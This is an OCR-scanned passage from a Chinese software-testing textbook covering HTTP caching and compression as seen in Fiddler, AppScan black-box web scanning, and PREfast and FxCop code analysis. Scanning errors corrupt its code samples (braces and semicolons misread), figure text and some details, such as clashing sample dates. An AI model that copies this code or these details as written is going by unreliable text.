可 以 观察 下 面 两 个 连续 的 HTTP 请 求 代码 ， 它 们 请 求 同 一 个 图 片 。 使 用 者 会 在 Fiddler 
中 发 现 : 在 第 一 个 本 地 缓存 版 本 中 ， 服 务 器 返回 一 个 含有 ETAG 的 文件 ， 和 一 个 含有 最 后 
修改 日 期 的 文件 ， 在 这 个 请 求 会 话 中 就 使 用 了 本 地 的 缓存 版 本 。 这 样 就 构成 了 一 个 有 条 件 
的 请 求 的 创建 条 件 。 然 后 再 次 请 求 这 个 图 片 的 时 候 , 服务 器 就 会 响应 一 个 本 地 缓存 的 文件 ， 
当然 前 提 是 首次 缓存 图 片 的 ETAG 值 或 If Modified-Since 值 跟 服务 器 上 匹配 的 话 ， 服 务 器 
就 响应 一 个 HTTP/304 给 客户 端 。 

HTTP 请 求 代码 如 下 : 

第 1 个 会 话 

GET /images/banner.jpg HTTP/1.1 

Host: http://www.bayden.com/ 

HTTP/1.1 200 OK 

Date: Tue, 08 Mar 2006 00:32:46 GMT 

Content-Length: 6171 

Content-Type: image/jpeg 

ETag: "40c7f76e8d30c31:2fe20" 

Last-Modified: Thu, 12 Jun 2008 02:50:50 GMT 

第 2 个 会 话 

GET /images/banner.jpg HTTP/1.1 

If-Modified-Since: Thu，12 Jun 2008 02:50:50 GMT 

If-None-Match: "40c7f76e8d30c31:2fe20" 


Host: http://www.bayden.com/ 
HTTP/1.1 304 Not Modified 


一 个 HTTP/304 响应 仅仅 包含 头 ， 没 有 主体 body， 所 以 在 进行 传输 的 时 候 要 比 携带 资 
源 的 情况 下 快 很 多 。 尽 管 如 此 ，HTTP/304 响应 需要 一 个 服务 器 的 往返 ， 但 是 通过 细心 的 
设置 响应 头 ，Web 程序 员 可 以 消除 这 种 隐患 。 
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8. 缓存 相关 响应 头 


通常 缓存 机 制 是 由 响应 头 控制 的 ，HTTP 规范 描述 了 Header 缓存 控制 机 制 ， 

Cache-Control 头 的 参数 设置 如 下 : 

口 Public: 响应 作为 公共 缓存 ， 并 且 在 多 用 户 间 共享 。 

口 Private: 响应 只 能 作为 私有 缓存 ， 不 能 在 用 户 间 共享 。 

口 No-cache: 响应 不 会 被 缓存 。 

口 No-store: 响应 不 会 被 缓存 ， 并 且 不 会 被 写 入 客户 端 。 这 是 基于 安全 的 考虑 ， 只 

某 些 敏 感 的 响应 才 会 使 用 这 种 方式 。 

Max-age=#seconds: 响应 将 会 在 某 个 指定 的 秒 数 内 缓存 , 一 旦 时 间 过 了 , 就 不 会 缓存 。 

口 Must-revalidate: 响应 会 被 重用 ， 来 满足 接 下 来 的 请 求 ， 但 是 必须 到 服务 器 端 去 验 
证 目前 的 缓存 是 不 是 最 新 的 。 

如 果 发 现 有 人 经 常 在 你 的 网 站 上 更 新 文件 ， 但 是 并 没有 更 改 文件 名 ， 就 必须 非常 小 心 

地 设置 缓存 生存 时 间 。 例 如 ， 网 站 需要 一 个 显示 当前 年 份 的 图 片 文件 thisyear.gif， 就 需要 

保证 这 个 缓存 过 期 时 间 不 能 超过 一 天 ， 和 否则 用 户 在 12 月 31 号 访问 网 站 的 时 候 , 在 1 月 1 

号 就 不 能 显示 正确 的 日 期 。 

由 于 某 些 原 因 ， 服 务 器 可 能 会 设置 Progma: no-cache 头 。Header 中 的 参数 指令 Vary 
表示 一 个 缓存 信号 ， 指 令 Vary: User-Agent 表示 缓存 当前 的 响应 ， 但 是 仅 限于 发 送 同样 的 
User-Agent 头 。 指 令 Vary: * 就 相当 于 Cache-Control: no-Cache。Vary 与 ASPNET 中 的 组 
存 参数 一 样 ， 主 要 表示 根据 什么 来 缓存 。 

使 用 HTTP 会 话 列表 ，Fiddler 用 户 可 以 看 到 在 页 面 里 包含 的 HITP 缓存 头 。Fiddler 
会 话 列表 如 果 不 包 含 过 期 时 间或 者 Cache-Control， 那 么 客户 端 就 被 迫 进行 一 个 有 条 件 的 请 
求 ， 保 证 所 有 的 资源 都 是 最 新 的 。 


9. WinInet 缓 存 和 Fiddler 的 文件 压缩 





口 





IE 通过 Microsoft windows Internet Services 最 大 程度 的 利用 缓存 服务 。Winmet 允许 用 
户 配置 缓存 的 大 小 和 行为 ， 设 置 缓存 进行 如 下 操作 步骤 : 

(1) 打开 亚 。 

(2) 选择 “工具 ”一 “Internet 选项 ”命令 ， 在 “常规 ”选项 卡 中 ， 临 时 文件 夹 内 ， 单 
击 “ 设 置 ”按钮 。 

使 用 者 可 以 使 用 Fiddler 的 自 定义 规则 来 标记 某 些 需要 的 ， 如 某 个 响应 大 于 2SKB， 可 
以 把 当前 的 Session 标记 为 红色 ， 更 加 醒目 。 以 下 代码 包含 在 OnBeforeResponse 事件 中 : 


// Flag files over 25KB if (oSession.responseBodyBytes.length > 25000) 
1 





oSession["ui-color"] = "red"7 
oSession["ui-bold"] = "true"; 
oSession["ui-customcolumn"] = "Large file"7 
} 





同样 ， 也 可 以 标记 响应 并 不 指示 缓存 信息 : 


// Mark files which do not have caching information 
if (!oSession.oResponse.headers.Exists ("Expires") 
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&&!OSession.oResponse.headers.Exists ("Cache-Control")) 

i. 

oSession["ui-color"] = "purple"; 

oSession["ui-bold"] = "true"; 

} 

HTTP 压缩 可 以 非常 显著 地 降低 客户 端 和 服务 器 端的 通信 量 。 节 省 超过 50% 的 HIML， 
XML，CSS，JS 等 文件 数量 。 客 户 端 浏览 器 发 送 一 个 信号 给 服务 器 ， 展 示 HITP 压缩 过 的 
内 容 ， 并 且 把 客户 端 所 支持 的 压缩 类 型 放 在 请 求 的 Header 中 ， 请 求 代码 如 下 : 

deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows 2008 5.1; 

SV1; .NET CLR 1.1.4322)Host: search.msn.com 

Accept-Encoding 头 表 明 正 愿意 接受 GZIP 格式 和 DEFLATE 格式 的 压缩 响应 。 相应 的 
响应 如 下 : 


HTTP/1.1 200 OKContent-Type: text/html; charset=utf-8Server: 

Microsoft-IIS/6.0 -~-Microsoft-HTTPAPI/1.0X-Powered-By: ASP.NETVary: 

Accept-EncodingContent-Encoding: gzipDate: Tue, 15 Feb 2006 09:14:36 

GMTContent-Length: 1277Connection: closeCache-Control: private, max-age= 

3600 

另外 ,可 以 使 用 Fiddler 来 解压 缩 这 些 数 据 。 实 验 表明 ， 使 用 HTTP 压缩 能 大 量 减 少数 
据 往 返 ,一 个 普通 的 CSS 文件 甚至 能 减少 80%。 当 然 ， 压缩 是 以 牺牲 CPU 性 能 为 代价 的 ， 
特别 是 压缩 动态 文件 。 一 般 的 权衡 方法 是 压缩 例如 JS，CSS 等 静态 文件 ， 它 们 在 首次 压缩 
后 ， 就 会 被 存储 在 服务 器 上 。 


15.2 黑 盒 技术 


黑 盒 测试 也 称 功能 测试 或 数据 驱动 测试 , 是 检测 已 知 产品 所 应 具有 的 功能 。 在 测试 时 ， 
把 程序 看 作 一 个 不 能 打开 的 黑 盆 子 ， 在 完全 不 考虑 程序 内 部 结构 和 内 部 特性 的 情况 下 ， 在 
程序 接口 进行 测试 ， 黑 盒 测 试 只 检查 程序 功能 是 否 按照 需求 规格 说 明 书 的 规定 正常 使 用 
程序 是 否 能 适当 地 接收 输入 数据 而 产生 正确 的 输出 信息 ， 并 且 保 持 外 部 信息 (如 数据 库 或 
文件 ) 的 完整 性 。 

黑 盒 测试 方法 主要 有 等 价 类 划分 、 边 值 分 析 、 因 果 图 、 错 误 推 测 等 ， 主 要 用 于 软件 确 
认 测试 。 黑 盒 测试 着 眼 于 程序 外 部 结构 而 不 考虑 内 部 多 辑 结构 ， 针 对 软件 界面 和 软件 功能 
进行 测试 。 黑 盒 测 试用 的 是 穷 举 输入 测试 ， 只 有 把 所 有 可 能 的 输入 都 作为 测试 情况 使 用 ， 
查 出 程序 中 所 有 的 错误 。 实 际 上 测试 情况 有 无 穷 多 个 ， 人 们 不 仅 要 测试 所 有 合法 的 输入 ， 
而 且 还 要 对 那些 不 合法 但 是 可 能 的 输入 进行 测试 。 

黑 盒 扫描 工具 AppScan。 

Rational AppScan 是 一 种 有 效 的 企业 级 Web 应 用 安全 测试 组 件 ， 可 以 对 所 有 常见 的 
Web 应 用 漏洞 进行 扫描 和 测试 , 包括 那些 WASC 分 类 定义 的 Web 应 用 威胁 , 如 SQL 注入 、 
跨 网 站 脚本 以 及 缓存 溢出 等 攻击 。 

AppScan 的 设计 为 安全 审计 和 渗透 测试 人 员 提供 了 一 种 直观 且 易于 操作 的 工具 。 测 试 
策略 管理 器 、 实 时 扫描 日 志 、 扫 描 权限 集中 管理 、 用 户 自 定义 测试 和 定时 扫描 等 为 用 户 提 
供 了 更 高 的 透明 度 和 客户 化 定制 能 力 ， 使 用 户 能 针对 其 应 用 所 需 部 分 进行 准确 的 扫描 。 


El 
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如 图 15-7 所 示 ，AppScan 工作 方式 比较 简单 ， 测 试 人 员 不 需要 了 解 Web 应 用 本 身 的 
结构 。AppScan 拥有 庞大 完整 的 攻击 特征 库 ， 通 过 在 http request 中 插入 测试 用 例 的 方法 进 
行 几 百 种 应 用 攻击 模拟 ， 再 分 析 http response 来 判断 该 应 用 是 否 存在 相应 的 漏洞 。 

Web 应 用 程序 

















HTTP 请 求 











< HTTPH 向 应 

















图 15-7 AppScan 工作 示意 图 

整个 过 程 简单 高 效 ， 测试 人 员 可 以 快速 地 定位 漏洞 所 在 的 位 置 ， 同 时 AppScan 可 以 详 
细 指 出 该 漏洞 的 原理 以 及 解决 该 漏洞 的 方法 ， 帮 助 开 发 人 员 迅 速 修复 程序 安全 隐患 。 对 于 
攻击 的 特征 以 及 测试 用 例 用 户 不 需要 花费 大 量 的 精力 , WatchFire 团队 会 定期 的 对 特征 库 进 
行 更 新 ， 随 时 保证 与 业界 的 同步 ， 最 大 化 的 提高 用 户 的 工作 效率 。 

下 面 通过 简单 的 实例 介绍 一 下 AppScan 的 使 用 步 又 : 

(1) 确定 扫描 站 点 的 URL， 根 据 默认 的 模板 配置 向 导 ， 确 定 扫描 的 整个 站 点 模型 以 及 
要 扫描 的 漏洞 种 类 。 例如 , 扫描 企业 应 用 www.xxx.com, 根据 默认 值 扫描 是 否 有 安全 隐患， 
启动 AppScan， 创 建 一 个 扫描 ， 输 入 www.xxx.com， 根 据 配 置 向 导 直 至 完成 。 默 认 的 模板 
配置 向 导 的 界面 如 图 15-8 所 示 。 


欢迎 
七 打开 ~- © Nit sppsan 
门 建交 蜡 -… 

| 入 | appscm 的 按 桂 知识 
© demoitestfire. ne 


询 〗 下 载 扩展 版 


@) Nl (ror) 








| 
上 加 启动 AppSean 时 显示 该 屏幕 (D) 


15-8 AppScan 模板 配置 向 导 
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(2) 创建 一 个 新 的 扫描 ， 如 图 15-9 所 示 。 


名 起 的 uRL 

从 该 VEL 启动 扫 扩 : 

er com 

Mh: http: /asme testfire net/ 








怒 区 分 大 小 写 的 路 径 
加 将 所 有 路 径 作为 区 分 大 小 写 来 处 理 (Vnix、Linax 等 ) (D 


并 其 他 服务 器 和 冉 
在 该 扫 扬中 包含 以 下 其 他 服务 器 和 域 : 








站 我 需要 配置 其 他 连接 设 置 〈 代 理 、 平 台 认 证 》 (A) 
i 


《上 - 步 四 ] [下 -- 步 D> 好 消 (@ 








图 15-9 AppScan 模板 配置 向 导 


(3) 启动 扫描 进行 测试 ， 只 需 要 单 击 执行 按钮 ,等 待 一 段 时间 后 就 可 以 查看 扫描 结果 。 


如 图 15-10 所 示 ，AppScan 以 各 种 维度 展现 扫描 结果 ， 不 仅 定位 了 问题 发 生 的 位 置 
也 提出 了 问题 的 解决 方案 : 
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图 15-10 AppScan 扫描 后 的 结果 





除 上 述 的 扫描 功能 外 ，AppScan 同时 提供 了 很 多 高 级 功能 ， 帮 助 客户 对 复杂 应 用 进行 


检测 ， 支 持 的 扫描 配置 如 下 : 


a 
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@ Starting URL: 起 始 URL， 制 定 被 测 应 用 的 起 始 地 址 。 

@) Custom Error Pages: 制定 错误 网 页 提高 测试 效率 。 

@ Session IDs: 管理 测试 过 程 中 的 session。 

由 Automatic Server Detection: 自动 检测 应 用 服务 器 、Web Server 和 操作 系统 。 

@@ Exclusion and Inclusion: 制定 哪些 Web 页 面 被 扫描 ， 哪 些 文件 类 型 不 被 扫描 。 

@ Scan Limits: 制定 扫描 次 数 限制 。 

@ Advanced: 选择 扫描 的 方式 ， 分 为 宽度 扫描 和 深度 扫描 。 

Communication Settings: 对 扫描 中 的 延 时 和 线程 数量 等 参数 进行 配置 。 

@ Proxy Settings: 代理 设置 。 

Login/logout: 对 被 测 应 用 的 登录 方式 进行 设置 ， 可 以 采用 录制 回放 的 方式 或 自动 
登录 的 方式 。 

QD configure a Test Policy: 配置 测试 策略 。 

如 上 所 述 ， 可 以 通过 AppScan 进行 一 系列 高 级 配置 ， 制 定 所 要 检测 的 Web 模型 ， 即 
扫描 范围 和 扫描 的 方式 等 ， 同 时 也 可 以 定义 需要 扫描 漏洞 的 列表 ， 保 证 用 户 关心 的 网 站 模 
型 无 安全 漏洞 。 在 检测 出 安全 漏洞 后 ，AppScan 又 提供 全 面 的 解决 方案 帮助 客户 快速 解决 
这 些 问题 ， 最 大 化 的 保证 Web 应 用 的 安全 。 另 外 ，AppScan 也 支持 Web 服务 的 测试 。 

AppScan 提供 了 完善 的 报表 功能 ， 支 持 用 户 对 扫描 的 结果 进行 各 种 分 析 ， 包 括 对 行业 
或 法 规 的 支持 程度 。 同 时 AppScan 也 提供 了 一 系列 小 工具 ， 如 Authentication Tester， 通 过 
暴力 检测 方法 扫描 被 测 网 站 的 用 户 名 称 和 密码 ;，HTTP Request Editor， 提 供 了 编辑 Http 


request 功能 等 。 








15.3” ”二进制 代码 分 析 


目前 ， 国 内 外 对 代码 漏洞 的 检测 研究 还 十 分 有 限 。 绝 大 部 分 的 工作 都 集中 在 如 何 对 现 
有 、 己 被 发 现 的 系统 漏洞 进行 防治 ， 而 缓冲 区 溢出 攻击 防范 和 检测 工具 大 多 只 是 针对 某 种 
攻击 目标 的 解决 方案 ， 适 用 性 有 限 。 此 外 ， 绝 大 多 数 的 检测 方法 都 是 基于 源 代码 的 ， 这 些 
极 大 地 限制 了 现 有 工具 的 使 用 范围 。 


1. PREfast 


PREfast 可 以 在 代码 编译 时 快速 检测 出 潜在 错误 ， 其 中 主要 包括 以 下 儿 个 方面 : 

1) 内 存 

内 存 包括 潜在 的 内 存 泄漏 、 非 关联 NULL 指针 、 对 未 初始 化 内 存 的 访问 、 对 内 核 模式 
堆栈 的 过 度 使 用 以 及 对 标签 使 用 不 当 等 。 

2) 资源 

资源 包括 未 能 释放 的 资源 、 某 函数 持 有 不 应 该 持 有 的 资源 以 及 函数 未 能 持 有 的 其 应 该 
持 有 的 资源 等 。 

3) 函数 用 法 

函数 用 法 包括 某 些 函 数 的 不 正确 使 用 、 不 正确 的 函数 参数 、 函 数 的 参数 类 型 不 匹配 ( 因 
为 没有 严格 检查 其 类 型 ) 、 可 能 使 用 某 些 过 时 的 函数 以 及 对 可 能 不 正确 的 中 断 请 求 
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(InterruptRequest Level，IRQL) 的 函数 调用 等 。 

4) 浮 点 状态 

包括 无 保护 驱动 中 的 浮 点 硬件 状态 以 及 将 浮 点 状态 保存 在 不 同 的 信 QL 后 试图 恢复 。 

5) 优先 规则 

因为 启用 优先 规则 ， 代 码 将 不 按照 程序 员 的 要 求 执行 。 

6) 内 核 模式 编码 

编码 可 能 造成 错误 ， 如 修改 内 存 描述 符 表 (MDL) 结构 、 未 能 审查 被 调用 函数 的 变量 
值 以 及 误 用 分 页 代码 段 。 

7) 针对 驱动 的 编码 

具体 操作 通常 是 内 核 模式 驱动 程序 的 错误 来 源 ， 如 复制 整个 IO 请 求 数据 包 (IRP) 而 
并 没有 修改 成 员 ， 或 向 字符 串 或 结构 保存 指针 而 没有 将 参数 复制 到 DriverEntry 例 程 。 

8) 重要 性 

PREfast 能 够 高 效 检测 出 错误 ， 并 且 它 的 报错 方式 通常 能 够 快速 地 解决 问题 ， 这 是 其 
他 方法 和 工具 无 法 实现 的 ,有 助 于 帮助 用 户 将 测试 资源 集中 在 寻找 和 修复 更 重大 的 bug 上 。 
然而 ，PREfast 并 不 能 找 出 所 有 可 能 的 错误 或 所 有 错误 形式 ， 因 此 通过 PREfast 检测 并 不 一 
定 意味 着 代码 就 完全 没有 错误 。 可 以 使 用 其 他 可 用 的 工具 测试 代码 ， 包 括 Driver Verifier 


和 Static Driver Verifier 等 。 


2. FxCop 


FxCop 是 一 个 代码 分 析 工 具 ， 依 照 微 软 公 司 .NET 框架 的 设计 规范 对 托管 代码 
assembly。assembly 可 称 为 程序 集 , 指 的 是 .NET 的 .exe 或 .dl 文件 (不 包括 netmodule 文件 )。 
这 种 程序 集中 包含 4 种 信息 : assembly 清单 (包括 引用 外 部 的 assembly、netmodule、 资 源 
文件 及 包含 在 同一 文件 中 的 assembly) ; 类 型 描述 信息 , 包括 版 本 信息 与 类 的 描述 等 ; MSIL 
微软 中 间 语 言 ， 资 源 ( 图 标 等 ) 。FxCop 使 用 基于 规则 的 引擎 检查 出 代码 中 不 合 规范 的 部 
分 ， 用 户 也 可 以 定制 自己 的 规则 加 入 引擎 。 FxCop 工具 由 微软 公司 免费 提供 ， 它 的 最 新 版 
需要 .NET 2.0 支持 。 

最 新 版 的 FxCop 使 用 内 帘 (introspection, 或 称 内 观 、 内 视 ) 的 技术 , 帘 探 程序 集 内 部 ， 
这 不 同 于 前 一 个 版 本 中 的 映射 〈reflection， 或 称 反 射 ) 技术 。 这 是 一 个 重要 的 变革 ， 使 用 
上 一 个 版 本 在 调试 碰 到 问题 不 得 不 停 下 来 ,对 代码 作 了 任何 更 改 之 后 都 需要 重新 开始 调试 ， 
而 这 些 问题 对 于 新 版 本 都 不 存在 了 。 

大 多 数 代码 分 析 工 具 对 源 代码 进行 扫描 ， 而 FxCop 直接 对 编译 好 的 代码 进行 处 
理 。.NET 的 每 个 程序 集 都 有 其 元 数据 (metadata， 关 于 assembly 中 各 元 素 的 类 型 信息 库 ， 
它 本 身 也 存放 在 这 个 assembly 中 ) ， 它 对 assembly 以 及 assembly 内 用 到 的 所 有 类 型 进行 

FxCop 使 用 metadata 来 获取 代码 内 部 的 运行 状况 。 另 外 ， 它 也 对 代码 编译 时 生成 的 微 
软 中 间 语 言 (Microsoft Intermediate Language，MSIL) 进行 检查 。 

通过 对 metadata 和 MSIL 检查 的 结合 ，FxCop 可 以 得 出 大 量 信息 ， 获 得 对 代码 执行 时 
所 作 行 为 的 理解 。 它 把 代码 和 规则 逐一 比较 检查 , 找到 不 符合 规则 的 代码 时 就 生成 一 条 消息 。 

1) FxCop 界面 

FxCop 采用 单个 Windows 界面 ， 该 界面 包括 如 下 3 个 面板 区 : 


-Ns 
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(1) 设置 (configuration) 面板 ( 左 侧 ) : 这 个 面板 有 两 个 选项 卡 , 分 别 为 “目标 ”(target) 
和 “规则 ”(rules) ， 分 别 用 来 定义 所 要 分 析 的 各 个 assembly 以 及 分 析 所 用 的 规则 。FxCop 
把 所 要 分 析 的 assemblies、 资 源 (resources) 、 命 名 域 (namespaces) ， 或 类 型 〈types) 叫 
做 目标 ， 规 则 对 这 些 目标 进行 比 对 ， 输 出 结果 。 

(2) 消息 (message) 面板 〈 右 侧 ) : 分 析 结 果 ( 由 工具 条 上 的 “分 析 ” 按 钮 启动 ) 将 
在 消息 面板 中 显示 ， 消 息 主 要 是 FxCop 推荐 的 代码 /assembly 改进 信息 列表 。 

(3) 属性 (properties) 面板 (屏幕 底部 ) : 该 面板 有 两 个 选项 卡 ， 分 别 标 为 “输出 ” 
Coutput) 和 “属性 ”。“ 输 出 ”选项 卡 显示 根据 规则 得 出 的 信息 、 和 警告 和 错误 消息 。“ 属 
性 ”选项 卡 则 显示 所 选中 的 assembly、 命 名 域 、 类 型 、 类 型 成 员 、 规 则 群 、 规 则 ， 或 消息 
的 详细 信息 。 

2) 消息 

消息 面板 是 FxCop 界面 上 最 重要 的 部 分 , 给 出 了 所 要 改进 的 内 容 的 信息 。 这 就 是 为 什 
么 首选 FxCop 工具 的 原因 。 

FxCop 工具 产生 的 消息 包括 以 下 5 栏 〈 也 可 以 在 工具 中 增加 或 删除 信息 栏目 ) : 

(1) 等 级 (level) : FxCop 为 每 个 问题 的 严重 性 指定 一 个 等 级 。 这 些 等 级 分 别 如 下 : 

@ 严重 错误 (critical Error) 。 

@ 错误 (error) 。 

@ 严重 警告 (critical Waming) 。 

@ 警告 (waming) 。 

@ 信息 (informational) 。 

严重 错误 等 级 表明 在 大 多 数 情 况 下 代码 不 能 正确 执行 ， 因 此 尤其 重要 。 信 息 等 级 则 最 
无 关 紧 要 ， 因 为 它 仅仅 对 代码 的 信息 进行 归纳 。 

(2) 修复 类 别 (Fix Category) : 修复 类 别 在 每 条 消息 中 进行 说 明 , 可 能 的 两 个 值 是 “ 打 
断 ” (breaking) 〈 即 ， 这 个 代码 问题 会 打 断 代码 执行 ， 代 码 不 会 按照 预想 的 方式 运行 ) 和 
“不 打 断 ” (Not Breaking) 。 

(3) 确信 度 〈certainty) :确信 度 是 FxCop 确认 问题 确实 发 生 的 可 能 性 。 实 际 上 ， 经 
过 对 疑问 代码 的 一 番 检 查分 析 之 后 ，FxCop 给 每 一 项 消息 分 配 一 个 百分率 ， 即 程序 对 问题 
发 生 的 确信 程度 。 

(4) 规则 (rmle) : 产生 这 个 消息 的 规则 名 称 。 

(5) 项 目 (item) : 产生 这 个 消息 的 目标 项 目 名 称 。 

如 果 要 知道 消息 的 更 多 信息 ， 可 以 双击 查看 完整 消息 ， 内 容 包 括 所 违反 的 规则 详情 以 
及 规则 和 冲突 的 详细 代码 。 

3) FxCop 实施 编码 标准 

FxCop 是 一 个 代码 分 析 工 具 ， 检 查 .NET 托管 代码 程序 集 是 否 遵 从 前 面 提 到 的 “.NET 
设计 准则 ”。FxCop 提供 标准 的 代码 分 析 规 则 ， 人 允许 为 项 目 自 定义 规则 ， 在 源 代码 中 禁止 
发 送 FxCop 警告 。 

4) 针对 要 检查 的 代码 运行 FxCop 

针对 每 个 项 目 必须 执行 的 FxCop 代码 进行 分 析 , 定义 一 个 运行 此 代码 分 析 的 标准 构建 
配置 。 代 码 检查 的 部 分 工作 是 : 通过 配置 FxCop， 验 证 项 目 正 确 地 实施 了 标准 FxCop 构建 
配置 并 且 所 检查 的 代码 通过 了 FxCop 的 评估 。 
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5) 在 源 代码 中 检查 对 FxCop 错误 的 禁止 

在 要 检查 的 代码 中 搜索 禁止 FxCop 消息 的 内 容 。 使 用 者 可 以 使 用 Ctrl+F 键 在 当前 项 目 
中 搜索 CodeAnalysis。 如 果 找 到 禁止 FxCop 的 内 容 ， 需 要 确认 有 必要 进行 禁止 ， 并 且 禁 止 
的 原因 已 在 注释 中 明确 注 明 。 例 如 ， 以 下 代码 的 禁止 就 不 是 必要 的 : 

// FxCop 对 于 不 支持 的 "\n\n" 符 号 串 进 行 出 错 处 理 

[System.Diagnostics.CodeAnalysis.SuppressMessage 

("Microsoft.Globalization", 

"CA1303:DoNotPassLiteralsAsLocalizedParameters", MessagelId = 


"System.Windows.Forms.TextBoxBase.AppendText (System.String)") ] 
this.resultsTextBox.AppendText ("\n\n" + Strings.contextErrorMessage); 


如 下 面 代码 所 示 ， 只 需 简单 更 改 代 码 就 可 以 避免 出 现 FxCop 错误 : 


this.resultsTextBox.AppendText ( Environment .NewLine + 
Environment .NewLine + Strings.contextErrorMessage); 


6) 检查 逻辑 性 

检查 代码 的 主要 目的 是 查找 逻辑 中 的 缺陷 并 强制 执行 团队 的 编码 标准 。 如 果 使 用 
FxCop 来 强制 执行 编码 标准 ， 就 可 以 投入 更 多 的 时 间 来 检查 代码 的 逻辑 性 。 

.NET 框架 包含 有 许多 类 ， 而 每 个 类 又 有 许多 方法 ， 没 有 人 能 够 通晓 所 有 的 类 和 方法 。 
对 于 类 和 方法 ， 应 尽 可 能 地 使 用 IntelliSense 描述 。 

如 果 无 法 通过 现 有 的 注释 以 及 类 或 方法 的 IntelliSense 描述 来 了 解 代码 的 作用 , 则 说 明 
代码 不 具备 足够 的 注释 信息 。 如 果 认 为 逻辑 的 执行 效果 与 编写 者 的 意图 不 符 ， 则 可 能 是 因 
为 逻辑 本 身 有 缺陷 ， 或 者 是 因为 代码 的 注释 信息 不 足以 明确 说 明 其 作用 。 

7) 构建 代码 

在 所 有 项 目 配 置 下 构建 代码 是 一 种 很 好 的 做 法 。 开 发 人 员 可 能 会 态 记 在 所 有 配置 下 构 
建 代码 ， 应 该 要 求 编写 者 在 提交 代码 前 修正 错误 。 

例如 ， 定 义 Release 配置 来 排除 单元 测试 是 常见 的 方法 。 如 果 对 某 个 方法 的 签名 进行 
了 更 改 但 没有 更 新 单元 测试 ， 则 代码 在 Release 配置 下 可 以 正常 构建 ， 但 在 Debug 配置 下 
不 是 这 样 。 

8) 查找 单元 测试 

在 检查 新 代码 时 ， 希 望 同 时 显示 单元 测试 与 功能 性 代码 。 在 检查 代码 更 改 时 ， 有 必要 
对 新 的 或 已 修正 的 单元 测试 进行 检查 。 运 行 已 有 的 单元 测试 以 及 任何 提交 进行 代码 检查 的 
单元 测试 。 如 果 单 元 测试 没有 通过 ， 则 要 求 编写 者 更 新 功能 代码 和 单元 测试 。 

9) 查找 参数 验证 

对 于 字符 串 参 数 ， 应 该 检查 是 否 为 null 对 象 或 是 否 等 于 StringEmpty 。 在 
String.ISNullOrEmpty 返回 true 的 情况 下 某 个 相应 的 操作 可 能 会 引发 ArgumentException 或 
ArgumentNullException 异常 。 但 在 其 他 情况 下 , 该 方法 可 能 只 返回 调用 者 而 不 采取 任何 操作 。 

在 检查 代码 时 ， 查 找 可 能 会 引发 某 些 意外 行为 的 参数 值 。 这 些 引 发 “不 好 ”结果 的 值 
可 能 会 非常 明显 ， 也 可 能 并 不 明显 。 例 如 ， 考 虑 一 个 应 该 代表 0.0 和 100.0 之 间 的 某 个 数 
值 数据 的 字符 串 ， 代 码 可 能 需要 做 一 些 除 null 检查 之 外 的 其 他 验证 ， 如 去 除开 始 和 结尾 空 
格 、 将 字符 串 转换 为 数字 格式 以 及 验证 该 值 在 应 有 的 范围 之 内 等 等 。 
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10) 确认 必要 的 XML 元 素 

每 个 类 的 定义 和 所 有 公共 成 员 都 应 该 有 XML 标签 summary 来 描述 该 类 或 成 员 。 这 样 ， 
类 的 用 户 在 编辑 代码 时 便 可 以 查看 相应 的 描述 。 在 适当 的 情况 下 ， 还 可 能 会 需要 XML 标 
签 parameter。 在 Visual Studio 2010 中 ， 如 果 在 类 或 方法 定义 内 容 的 上 方 空白 行 中 输入 人 W 
或 "，C# 和 VB 代码 编辑 器 会 自动 插入 summary 或 parameter 标签 。 这 种 自动 插入 非常 有 
用 ， 无 须 关 注 输 入 的 XML 标签 的 正确 性 。 

如 果 开 发 团队 对 于 类 或 成 员 定义 使 用 内 容 更 为 详细 的 XML 标 头 《如 某 些 团队 需要 使 
用 描述 变更 历史 的 XML 标 头 ， 其 中 包括 有 关 变 更 、 编 写 者 和 数据 信息 的 描述 ) ， 请 确认 
标 头 存在 并 且 输 入 了 合适 的 数据 。 

11) 验证 所 有 的 XML 元 素 

确保 所 有 的 XML 元 素 格式 完好 。 这 一 点 很 重要 ,因为 用 于 处 理 源 代码 中 的 XML 注释 
的 工具 要 求 XML 的 格式 正确 ， 这 样 才能 正确 地 进行 处 理 。 

如 果 开 发 团队 不 需要 那些 自动 生成 的 空 的 XML 元素, 可 以 删除 它们 。 如 ,Visual Basic 
会 自动 生成 returms 和 remarks 元 素 ， 这 两 个 元 素 在 许多 情况 下 都 可 以 删除 。 

12) 注释 的 质量 

注释 内 容 必须 清楚 ， 能 够 准确 地 描述 相关 的 代码 。 出 现 注释 内 容 与 代码 不 符 的 常见 情 
况 又 多 ， 我 们 应 提高 警惕 ， 有 时 已 在 模块 中 更 改 了 现 有 代码 后 ， 就 会 忽略 更 新 注释 内 容 。 
还 有 ， 如 果 采 用 了 另 一 个 应 用 程序 中 的 某 一 段 代 码 实现 当前 所 需 的 功能 ， 则 源 代 码 中 的 注 
释 可 能 不 适合 当前 代码 。 

13) 字符 串 常 量 

字符 串 应 该 打包 到 字符 串 资 源 文件 中 ， 将 字符 串 收 集 到 一 个 位 置 ， 从 而 更 容易 更 改 字 
符 串 文 本 。 通 过 使 用 字符 串 资 源 文件 还 可 以 实现 本 地 化 和 全 球 化 。 以 前 ， 生 成 和 使 用 字符 
串 资 源 文件 并 不 是 一 件 很 容易 的 事情 。 现 在 ， 资 源 重 构 工 具 可 以 帮 解 决 这 个 问题 ， 代 码 如 
下 所 示 : 

private static string snippetSchemaPathBegin = 

Path.Combine (Environment .ExpandEnvironmentVariables ("%ProgramFiles%®"), 

@"\Microsoft Visual Studio 8\Xml\Schemas"); 

通过 使 用 资源 重 构 工具 可 以 快速 将 其 更 改 为 以 下 内 容 : 

private static string snippetSchemaPathBegin = 

Path.Combine (Environment .ExpandEnvironmentVariables( 

Strings.ProgramFiles), Strings.MicrosoftVisualStudio8XmlSchemas); 

14) 文件 名 和 路 径 

在 检查 代码 时 ， 查 找 字 符 串 常量 或 含有 硬 编码 文 件 路 径 的 字符 串 资 源 文件 。 确 保 始 终 
使 提供 路 径 名 称 的 NET API (如 System.Windows.Forms.Application.ExecutablePath， 它 返 
回 启 动 应 用 程序 的 可 执行 文件 的 路 径 ) 或 配置 文件 条 目 来 引用 路 径 。 
与 此 类 似 ， 应 用 程序 的 文件 名 不 应 定义 为 字符 串 ， 或 在 字符 串 资源 文件 的 引用 中 进行 
定义 。 可 采取 的 替代 方法 有 配置 文件 、 环 境 变 量 或 由 用 户 输入 (如 传递 到 控制 台 应 用 程序 
的 参数 或 WinForms 应 用 程序 中 的 文件 对 话 框 )。 所 有 的 这 些 替 代 方 法 给 用 户 使 用 应 用 程 
